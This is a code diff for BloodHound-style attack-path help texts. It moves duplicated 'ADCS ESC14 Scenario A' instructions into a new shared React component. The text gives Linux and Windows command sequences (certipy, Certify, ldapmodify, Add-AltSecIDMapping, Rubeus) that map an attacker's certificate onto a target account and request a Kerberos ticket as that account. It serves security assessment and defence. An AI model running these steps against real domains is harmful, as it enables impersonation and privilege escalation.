b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx new file mode 100644 index 00000000000..9248fde5bc1 --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/AdcsEsc14ScenarioA.tsx @@ -0,0 +1,221 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +import { Link, Typography } from '@mui/material'; +import { FC } from 'react'; +import CodeController from '../CodeController/CodeController'; + +export const AdcsEsc14ScenarioALinux: FC = () => ( + <> + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring to + a certificate in the attacker's possession, and then use this certificate to authenticate as the target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a computer, or + enrolling a new certificate as a computer: + + + {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot + be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have + their mail or dNSHostName attribute set, which is required by the certificate template. The mail attribute + can be set on both user and computer objects but the dNSHostName attribute can only be set on computer + objects. Computers have validated write permission to their own dNSHostName attribute by default, but + neither users nor computers can write to their own mail attribute by default. + + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate using openssl: + + {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' +… +sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} + + + Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' attribute of + the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + Verify the that the mapping was added using ldapsearch: + + { + 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' + } + + + Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate and the IP + of a DC: + + {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} + + After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping string from the + 'altSecurityIdentities' attribute of the target principal: + + + { + 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' + } + + +); + +export const AdcsEsc14ScenarioAWindows: FC = () => { + return ( + <> + ADCS ESC14 Scenario A + + An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target referring + to a certificate in the attacker's possession, and then use this certificate to authenticate as the + target. + + + The certificate must meet the following requirements: +
    +
  1. Chain up to trusted root CA on the DC
    2. +
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. +
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. +
+

+ The EKUs that enable domain authentication over Kerberos: +

    +
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • +
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • +
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • +
  • Any Purpose (2.5.29.37.0)
    • +
  • SubCA (no EKUs)
    • +
+

+

+ The last certificate requirement means that user certificates will not work, so the certificate + typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} + meets these requirements and grants Domain Computers enrollment rights. The target can still be a + user. +

+ The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} + + How to disable the Subject Alternative Name for UPN mapping + + ). + + + Obtain a certificate meeting the above requirements for example by dumping a certificate from a + computer, or enrolling a new certificate as a computer: + + + { + 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' + } + + + If the enrollment fails with an error message stating that the Email or DNS name is unavailable and + cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does + not have their mail or dNSHostName attribute set, which is required by the certificate template. The + mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be + set on computer objects. Computers have validated write permission to their own dNSHostName attribute by + default, but neither users nor computers can write to their own mail attribute by default. + + + Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the certificate + as a PFX file: + + {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} + + The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or + X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. + + Get the SHA1 hash of the certificate public key using certutil: + + {`certutil.exe -dump -v .\\cert.pfx +… +Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 +…`} + + + Use Add-AltSecIDMapping to add the explicit certificate mapping string to the 'altSecurityIdentities' + attribute of the target principal: + + + { + 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + Verify the that the mapping was added using Get-AltSecIDMapping: + + {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} + + + Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity, + and the PFX-formatted certificate: + + + {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} + + + After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate mapping + string from the 'altSecurityIdentities' attribute of the target principal: + + + { + 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' + } + + + ); +}; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/index.ts b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/index.ts new file mode 100644 index 00000000000..70468946a4b --- /dev/null +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/AdcsEsc14ScenarioA/index.ts @@ -0,0 +1,17 @@ +// Copyright 2025 Specter Ops, Inc. +// +// Licensed under the Apache License, Version 2.0 +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +export { AdcsEsc14ScenarioALinux, AdcsEsc14ScenarioAWindows } from './AdcsEsc14ScenarioA'; diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx index b542667ec8a..c85038c1e73 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/LinuxAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = ({ @@ -154,104 +155,7 @@ const LinuxAbuse: FC = ( For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'Computer': @@ -372,106 +276,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } else { @@ -525,106 +330,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx index 4830ab6c1f7..d53a6f95eb8 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/References.tsx @@ -20,13 +20,6 @@ import { FC } from 'react'; const References: FC = () => { return ( - - https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 - -
https://www.youtube.com/watch?v=z8thoG7gPd0 diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx index 6fcc5133d39..8dd6c43aaab 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/GenericAll/WindowsAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -174,114 +175,7 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + Targeted Kerberoast attack @@ -484,115 +378,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } else { @@ -700,115 +486,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - 